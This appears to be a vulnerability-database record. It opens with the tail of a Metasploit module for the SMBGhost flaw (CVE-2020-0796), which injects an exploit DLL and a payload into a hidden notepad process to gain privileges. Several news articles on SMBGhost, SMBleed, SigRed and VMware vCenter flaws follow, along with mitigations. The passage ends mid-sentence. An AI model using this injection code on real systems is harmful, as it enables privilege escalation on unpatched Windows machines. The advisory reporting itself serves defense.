\nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Reader Sandbox won't allow to create a new process: \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \n \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll') \nlibrary_path = ::File.expand_path(library_path) \n \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157110/cve_2020_0796_smbghost.rb.txt"}], "thn": [{"lastseen": "2022-05-09T12:39:05", "description": "[](<https://thehackernews.com/images/-M_1KgL6tAuQ/YDYE-aJuyBI/AAAAAAAAB38/asAWmk7ZJscXPGS_gHJudw0GOAZrcEX7wCLcBGAsYHQ/s0/vmware.jpg>)\n\nVMware has addressed multiple critical remote code execution (RCE) vulnerabilities in VMware ESXi and vSphere Client virtual infrastructure management platform that may allow attackers to execute arbitrary commands and take control of affected systems.\n\n\"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) in its advisory.\n\nThe vulnerability, tracked as CVE-2021-21972, has a CVSS score of 9.8 out of a maximum of 10, making it critical in severity.\n\n\"In our opinion, the RCE vulnerability in the vCenter Server can pose no less a threat than the infamous vulnerability in Citrix (CVE-2019-19781),\" said Positive Technologies' Mikhail Klyuchnikov, who discovered and reported the flaw to VMware.\n\n\"The error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server.\"\n\nWith this access in place, the attacker can then successfully move through the corporate network and gain access to the data stored in the vulnerable system, such as information about virtual machines and system users, [Klyuchnikov noted](<https://swarm.ptsecurity.com/unauth-rce-vmware/>).\n\nSeparately, a second vulnerability (CVE-2021-21973, CVSS score 5.3) allows unauthorized users to send POST requests, permitting an adversary to mount further attacks, including the ability to scan the company's internal network and retrieve specifics about the open ports of various services.\n\nThe information disclosure issue, according to VMware, stems from an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in the vCenter Server plugin.\n\n[](<https://thehackernews.com/images/-ptRHS90VS-M/YDaOLCFCy0I/AAAAAAAA3oU/eE4iu9IU3WI1xoEKlX6eypn5wcFlZWhwQCLcBGAsYHQ/s0/command.jpg>)\n\nVMware has also provided workarounds to remediate CVE-2021-21972 and CVE-2021-21973 temporarily until the updates can be deployed. Detailed steps can be found [here](<https://kb.vmware.com/s/article/82374>).\n\nIt's worth noting that VMware rectified a command injection vulnerability in its vSphere Replication product ([CVE-2021-21976](<https://www.vmware.com/security/advisories/VMSA-2021-0001.html>), CVSS score 7.2) earlier this month that could grant a bad actor with administrative privileges to execute shell commands and achieve RCE.\n\nLastly, VMware also resolved a heap-overflow bug (CVE-2021-21974, CVSS score 8.8) in ESXi's service location protocol (SLP), potentially allowing an attacker on the same network to send malicious SLP requests to an ESXi device and take control of it.\n\n[OpenSLP](<https://www.openslp.org/doc/html/IntroductionToSLP/index.html>) provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.\n\nThe latest fix for ESXi OpenSLP comes on the heels of a similar patch ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) last November that could be leveraged to trigger a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) in the OpenSLP service, leading to remote code execution.\n\nNot long after, reports of active exploitation attempts emerged in the wild, with ransomware gangs [abusing](<https://twitter.com/GossiTheDog/status/1324896051128635392>) the vulnerability to take over unpatched virtual machines deployed in enterprise environments and encrypt their virtual hard drives.\n\nIt's highly recommended that users install the updates to eliminate the risk associated with the flaws, in addition to \"removing vCenter Server interfaces from the perimeter of organizations, if they are there, and allocate them to a separate VLAN with a limited access list in the internal network.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T07:54:00", "type": "thn", "title": "Critical RCE Flaws Affect VMware ESXi and vSphere Client \u2014 Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-3992", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974", "CVE-2021-21976"], "modified": "2021-02-24T17:35:31", "id": "THN:87AE96960D76D6C84D9CF86C2DDB837C", "href": "https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:15", "description": "[](<https://thehackernews.com/images/-CFswC_0BsxM/Xw3l4OFeD0I/AAAAAAAA3BU/WOcga12uuyA8n43M9fyL5rlNdMXOc7CTwCLcBGAsYHQ/s728-e100/windows-dns-server-hacking.jpg>)\n\nCybersecurity researchers today disclosed a new highly critical \"wormable\" vulnerability\u2014carrying a severity score of 10 out of 10 on the CVSS scale\u2014affecting Windows Server versions 2003 to 2019. \n \nThe 17-year-old remote code execution flaw ([CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>)), dubbed '**SigRed**' by Check Point, could allow an unauthenticated, remote attacker to gain domain administrator privileges over targeted servers and seize complete control of an organization's IT infrastructure. \n \nA threat actor can exploit SigRed vulnerability by sending crafted malicious DNS queries to a Windows DNS server and achieve arbitrary code execution, enabling the hacker to intercept and manipulate users' emails and network traffic, make services unavailable, harvest users' credentials and much more. \n \nIn a detailed [report](<https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/>) shared with The Hacker News, Check Point researcher Sagi Tzadik confirmed that the flaw is wormable in nature, allowing attackers to launch an attack that can spread from one vulnerable computer to another without any human interaction. \n \n\"A single exploit can start a chain reaction that allows attacks to spread from vulnerable machine to vulnerable machine without requiring any human interaction,\" the researcher said. \n \n\"This means that a single compromised machine could be a 'super spreader,' enabling the attack to spread throughout an organization's network within minutes of the first exploit.\" \n \nAfter the cybersecurity firm responsibly disclosed its findings to Microsoft, the Windows maker prepared a patch for the vulnerability and began rolling it out starting today as part of its July Patch Tuesday, which also includes security updates for 122 other vulnerabilities, with a total 18 flaws listed as critical, and 105 as important in severity. \n \nMicrosoft [said](<https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/>) it found no evidence to show that the bug has been actively exploited by attackers, and advised users to install the patches immediately. \n \n\"Windows DNS Server is a core networking component. While this vulnerability is not currently known to be used in active attacks, it is essential that customers apply Windows updates to address this vulnerability as soon as possible,\" Microsoft said. \n \n\n\n## Crafting Malicious DNS Responses\n\n \nStating that the objective was to identify a vulnerability that would let an unauthenticated attacker compromise a Windows Domain environment, Check Point researchers said they focused on Windows DNS, specifically taking a closer look at how a DNS server parses an incoming query or a response for a forwarded query. \n \nA forwarded query happens when a DNS server cannot resolve the IP address for a given domain name (e.g., www.google.com), resulting in the query being forwarded to an authoritative DNS name server (NS). \n \n\n\n \nTo exploit this architecture, SigRed involves configuring a domain's (\"deadbeef.fun\") [NS resource records](<https://en.wikipedia.org/wiki/List_of_DNS_record_types>) to point to a malicious name server (\"ns1.41414141.club\"), and querying the target DNS server for the domain in order to have the latter parse responses from the name server for all subsequent queries related to the domain or its subdomains. \n \nWith this setup in place, an attacker can trigger an integer overflow flaw in the function that parses incoming responses for forwarded queries (\"dns.exe!SigWireRead\") to send a DNS response that contains a [SIG resource record](<https://tools.ietf.org/html/rfc2535#section-2.3.1>) larger than 64KB and induce a \"controlled heap-based buffer overflow of roughly 64KB over a small allocated buffer.\" \n \nPut differently; the flaw targets the function responsible for allocating memory for the resource record (\"RR_AllocateEx\") to generate a result bigger than 65,535 bytes to cause an integer overflow that leads to a much smaller allocation than expected. \n \nBut with a single DNS message limited to 512 bytes in UDP (or 4,096 bytes if the server supports [extension mechanisms](<https://en.wikipedia.org/wiki/Extension_mechanisms_for_DNS>)) and 65,535 bytes in TCP, the researchers found that a SIG response with a lengthy signature alone wasn't enough to trigger the vulnerability. \n \nTo achieve this, the attack cleverly takes advantage of [DNS name compression](<https://powerdns.org/hello-dns/basic.md.html#dnsbasics>) in DNS responses to create a buffer overflow using the aforementioned technique to increase the allocation's size by a significant amount. \n \n\n\n## Remote Exploitation of the Flaw\n\n \nThat's not all. SigRed can be triggered remotely via a browser in limited scenarios (e.g., Internet Explorer and non-Chromium based Microsoft Edge browsers), allowing an attacker to abuse Windows DNS servers' support for [connection reuse and query pipelining](<https://tools.ietf.org/html/rfc7766#section-6.2.1>) features to \"smuggle\" a DNS query inside an HTTP request payload to a target DNS server upon visiting a website under their control. \n \nWhat's more, the bug can be further exploited to leak memory addresses by corrupting the metadata of a DNS resource record and even achieve [write-what-where](<https://cwe.mitre.org/data/definitions/123.html>) capabilities, allowing an adversary to hijack the execution flow and cause it to execute unintended instructions. \n \n\n\n[](<https://thehackernews.com/images/-HEx60rYsUag/Xw28tH1tAeI/AAAAAAAAAjg/NJQx1bGwsz4XXVX6VMdIZz_fT6pv4UyxACLcBGAsYHQ/s728-e100/dns-hacking.jpg>)\n\n \nSurprisingly, DNS clients (\"dnsapi.dll\") are not susceptible to the same bug, leading the researchers to suspect that \"Microsoft manages two completely different code bases for the DNS server and the DNS client, and does not synchronize bug patches between them.\" \n \nGiven the severity of the vulnerability and the high chances of active exploitation, it's recommended that users patch their affected Windows DNS Servers to mitigate the risk. \n \nAs a temporary workaround, the maximum length of a DNS message (over TCP) can be set to \"0xFF00\" to eliminate the chances of a buffer overflow: \n \n\n\n> reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\" /v \"TcpReceivePacketSize\" /t REG_DWORD /d 0xFF00 /f \n \nnet stop DNS &amp;&amp; net start DNS\n\n \n\"A DNS server breach is a very serious thing. Most of the time, it puts the attacker just one inch away from breaching the entire organization. There are only a handful of these vulnerability types ever released,\" Check Point's Omri Herscovici told The Hacker News. \n \n\"Every organization, big or small using Microsoft infrastructure is at major security risk, if left unpatched. The risk would be a complete breach of the entire corporate network.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T17:13:00", "type": "thn", "title": "17-Year-Old Critical 'Wormable' RCE Vulnerability Impacts Windows DNS Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2021-04-13T11:27:23", "id": "THN:DBFCCEBE2752BA05D9181D55D3477666", "href": "https://thehackernews.com/2020/07/windows-dns-server-hacking.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:34", "description": "[](<https://thehackernews.com/images/-XWqJWgCIL68/XmjWkC736wI/AAAAAAAAAEk/kCxnmKI_8FwVk2x8eaIUoMZR9IrJ6zuLACLcBGAsYHQ/s728-e100/windows-smbv3-wormable-vulnerability.jpg>)\n\nShortly after releasing its [monthly batch of security updates](<https://thehackernews.com/2020/03/microsoft-patch-tuesday-march-2020.html>), Microsoft late yesterday separately issued an [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) warning billions of its Windows users of a new critical, unpatched, and wormable vulnerability affecting **Server Message Block 3.0** (**SMBv3**) network communication protocol. \n \nIt appears Microsoft originally planned to fix the flaw as part of its March 2020 Patch Tuesday update only, but, for some reason, it pulled the plug at the last minute, which apparently did not stop a tech company from accidentally leaking the existence of the unpatched flaw. \n \nThe yet-to-be patched flaw (tracked as** CVE-2020-0796**), if exploited successfully, could allow an attacker to [execute arbitrary code](<https://kb.cert.org/vuls/id/872016/>) on the target SMB Server or SMB Client. \n \nThe belated acknowledgment from Microsoft led some researchers to call the bug \"[SMBGhost](<https://twitter.com/malwrhunterteam/status/1237480108568477697>).\" \n \n\"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server,\" Microsoft disclosed in an advisory. \"To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\" \n \nServer Message Block protocol provides the basis for file sharing, network browsing, printing services, and interprocess communication over a network. \n \n\n\n[](<https://thehackernews.com/images/-UcalHqQSaG0/XmjSmLBS_-I/AAAAAAAAAEY/S1FgtNQsCasVW03_xelhob0EUutLV6c1QCLcBGAsYHQ/s728-e100/cisco-smb-flaw.jpg>)\n\n \nAccording to a now-removed Cisco Talos post, the flaw opens vulnerable systems to a \"wormable\" attack, making it easy to propagate from one victim to the other. \n \nAlthough it's unclear when Microsoft plans to patch the flaw, the company is urging users to disable SMBv3 compression and block TCP port 445 on firewalls and client computers as a workaround. \n \nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force \n \nFurthermore, Microsoft has cautioned that disabling SMBv3 compression will not prevent the exploitation of SMB clients. \n \nIt's worth pointing out that the flaw impacts only Windows 10 version 1903, Windows 10 version 1909, Windows Server version 1903, and Windows Server version 1909. But it's possible more versions are affected as SMB 3.0 was introduced with Windows 8 and Windows Server 2012. \n \nDespite the severity of the SMB bug, there's no evidence that it's being exploited in the wild. But it's also necessary to draw attention to the fact that this is far from the only time SMB has been exploited as an attack vector for intrusion attempts. \n \nIn the past few years alone, some of the major ransomware infections, including [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) and [NotPetya](<https://thehackernews.com/2017/06/petya-ransomware-attack.html>), have been the consequence of SMB-based exploits. \n \nFor now, until Microsoft releases a security update designed to patch the CVE-2020-0796 RCE flaw, it's recommended that the system administrators implement the workarounds to block attacks attempting to exploit the vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T12:16:00", "type": "thn", "title": "Warning \u2014 Unpatched Critical 'Wormable' Windows SMBv3 Flaw Disclosed", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T12:27:42", "id": "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D", "href": "https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:33", "description": "[](<https://thehackernews.com/images/-5ab1xlAFvIs/XmprBKhq5MI/AAAAAAAA2hk/2zyiQtK0qLk65nIPuJSj39T5x7IgNWU8QCLcBGAsYHQ/s728-e100/windows-update-smb-flaw.jpg>)\n\nMicrosoft today finally released an emergency software update to patch the recently disclosed very dangerous [vulnerability in SMBv3 protocol](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) that could let attackers launch **wormable malware**, which can propagate itself from one vulnerable computer to another automatically. \n \nThe vulnerability, tracked as **CVE-2020-0796**, in question is a remote code execution flaw that impacts Windows 10 version 1903 and 1909, and Windows Server version 1903 and 1909. \n \nServer Message Block (SMB), which runs over TCP port 445, is a network protocol that has been designed to enable file sharing, network browsing, printing services, and interprocess communication over a network. \n \nThe latest vulnerability, for which a patch update ([KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>)) is now available on the Microsoft website, exists in the way SMBv3 protocol handles requests with compression headers, making it possible for unauthenticated remote attackers to execute malicious code on target servers or clients with SYSTEM privileges. \n \nCompression headers is a feature that was added to the affected protocol of Windows 10 and Windows Server operating systems in May 2019, designed to compress the size of messages exchanged between a sever and clients connected to it. \n \n\n\n \n\"To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it,\" Microsoft said in the [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>). \n \nAt the time of writing, there is only one known [PoC exploit](<https://twitter.com/kryptoslogic/status/1238057276738592768>) that exists for this critical remotely exploitable flaw, but reverse engineering new patches could now also help hackers find possible attack vectors to develop fully weaponized self-propagating malware. \n \nA separate team of researchers have also published a [detailed technical analysis](<https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html>) of the vulnerability, concluding a kernel pool overflow as the root cause of the issue. \n \nAs of today, there are nearly [48,000 Windows systems](<https://twitter.com/kryptoslogic/status/1238069159919063050>) vulnerable to the latest SMB compression vulnerability and accessible over the Internet. \n \nSince a patch for the wormable SMBv3 flaw is now available to download for affected versions of Windows, it's highly recommended for home users and businesses to install updates as soon as possible, rather than merely relying on the mitigation. \n \nIn cases where immediate patch update is not applicable, it's advised to at least disable SMB compression feature and block SMB port for both inbound and outbound connections to help prevent remote exploitation. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T14:30:00", "type": "thn", "title": "Critical Patch Released for 'Wormable' SMBv3 Vulnerability \u2014 Install It ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T19:09:39", "id": "THN:90048C5D2E69F2E769EE053B3E1555AA", "href": "https://thehackernews.com/2020/03/patch-wormable-smb-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-dg9ULZEsvBw/YLtYdH9lzzI/AAAAAAAACwY/7b0FWkEi2AgXUuJHgibePqXxv9PEVVCsgCLcBGAsYHQ/s0/VMware-vSphere.jpg>)\n\nMalicious actors are actively mass scanning the internet for vulnerable VMware vCenter servers that are unpatched against a critical remote code execution flaw, which the company addressed late last month.\n\nThe ongoing activity was detected by Bad Packets on June 3 and corroborated [yesterday](<https://twitter.com/GossiTheDog/status/1397315303978250242/photo/2>) by security researcher Kevin Beaumont. \"Mass scanning activity detected from 104.40.252.159 checking for VMware vSphere hosts vulnerable to remote code execution,\" [tweeted](<https://twitter.com/bad_packets/status/1400519385194766336>) Troy Mursch, chief research officer at Bad Packets.\n\nThe development follows the publication of a [proof-of-concept](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) (PoC) RCE exploit code targeting the VMware vCenter bug.\n\nTracked as [CVE-2021-21985](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) (CVSS score 9.8), the issue is a consequence of a lack of input validation in the Virtual SAN (vSAN) Health Check plug-in, which could be abused by an attacker to execute commands with unrestricted privileges on the underlying operating system that hosts the vCenter Server.\n\n[](<https://thehackernews.com/images/-2asxg2RGcVA/YLtXChb2ejI/AAAAAAAACwQ/ZlUYBOtRqGk1olUdewgacDkLMEk-xHXBwCLcBGAsYHQ/s0/poc.jpg>)\n\nAlthough the flaw was rectified by VMware on May 25, the company [strongly urged](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) its customers to apply the emergency change immediately. \"In this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,\" VMware said.\n\n[](<https://thehackernews.com/images/-gksBmuc98pQ/YLtWoqAxynI/AAAAAAAACwI/Xo8VvglhuhAdPffdp8I8DtnckVZbSzIKwCLcBGAsYHQ/s0/shodan.jpg>)\n\nThis is not the first time adversaries have opportunistically mass scanned the internet for vulnerable VMware vCenter servers. A similar remote code execution vulnerability ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by VMware in February became the [target of cyber threat actors](<https://twitter.com/bad_packets/status/1364661586070102016>) attempting to exploit and take control of unpatched systems.\n\nAt least [14,858 vCenter servers](<https://twitter.com/bad_packets/status/1364672466707128320>) were found reachable over the internet at the time, according to Bad Packets and Binary Edge.\n\nWhat's more, a new research from Cisco Talos earlier this week found that the threat actor behind the Python-based [Necro](<https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html>) bot wormed its way into exposed VMware vCenter servers by abusing the same security weakness to boost the malware's infection propagation capabilities.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-05T10:58:00", "type": "thn", "title": "ALERT: Critical RCE Bug in VMware vCenter Server Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-07T05:04:26", "id": "THN:71D3B9379166BDEEAEC59EE5E145C193", "href": "https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-31RfzSS3xQM/Xt-9Ggf-iMI/AAAAAAAAAbo/CAzBcgrMaUkcozaX_3-vN2Kqw-vCruNKwCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.jpg>)\n\nCybersecurity researchers today uncovered a new critical vulnerability affecting the Server Message Block (SMB) protocol that could allow attackers to leak kernel memory remotely, and when combined with a previously disclosed \"wormable\" bug, the flaw can be exploited to achieve remote code execution attacks. \n \nDubbed \"**SMBleed**\" ([CVE-2020-1206](<https://blog.zecops.com/vulnerabilities/smbleed-writeup-cve-2020-1206-chaining-smbleed-with-smbghost-for-a-rce/>)) by cybersecurity firm ZecOps, the flaw resides in SMB's decompression function \u2014 the same function as with [SMBGhost](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) or EternalDarkness bug ([CVE-2020-0796](<https://nvd.nist.gov/vuln/detail/CVE-2020-0796>)), which came to light three months ago, potentially opening vulnerable Windows systems to malware attacks that can propagate across networks. \n \nThe newly discovered vulnerability impacts Windows 10 versions 1903 and 1909, for which Microsoft today released security patches as part of its monthly [Patch Tuesday updates for June](<https://thehackernews.com/2020/06/windows-update-june.html>). \n \nThe development comes as the US Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory last week warning Windows 10 users to update their machines after exploit code for SMBGhost bug was published online last week. \n \nSMBGhost was deemed so serious that it received a maximum severity rating score of 10. \n \n\n\n[](<https://thehackernews.com/images/-HXrk2t3JHZo/Xt_WMvC_GjI/AAAAAAAA24g/XI7OAmusTswUO4fRatFn1viazIJt1A3YQCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.gif>)\n\n \n\"Although Microsoft disclosed and provided [updates for this vulnerability](<https://thehackernews.com/2020/03/patch-wormable-smb-vulnerability.html>) in March 2020, malicious cyber actors are targeting unpatched systems with the [new PoC](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>), according to recent open-source reports,\" [CISA said](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>). \n \nSMB, which runs over TCP port 445, is a network protocol that provides the basis for file sharing, network browsing, printing services, and interprocess communication over a network. \n \nAccording to ZecOps researchers, the flaw stems from the way the decompression function in question (\"[Srv2DecompressData](<https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/>)\") handles specially crafted message requests (e.g., [SMB2 WRITE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e7046961-3318-4350-be2a-a8d69bb59ce8>)) sent to a targeted SMBv3 Server, allowing an attacker to read uninitialized kernel memory and make modifications to the compression function. \n \n\"The message 